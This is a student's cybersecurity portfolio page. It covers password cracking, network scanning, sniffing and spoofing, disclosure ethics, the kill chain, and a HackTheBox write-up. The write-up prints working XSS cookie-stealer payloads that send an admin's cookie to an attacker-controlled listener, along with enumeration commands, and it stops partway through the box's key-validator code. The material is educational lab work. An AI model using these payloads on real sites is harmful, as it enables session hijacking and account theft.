          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
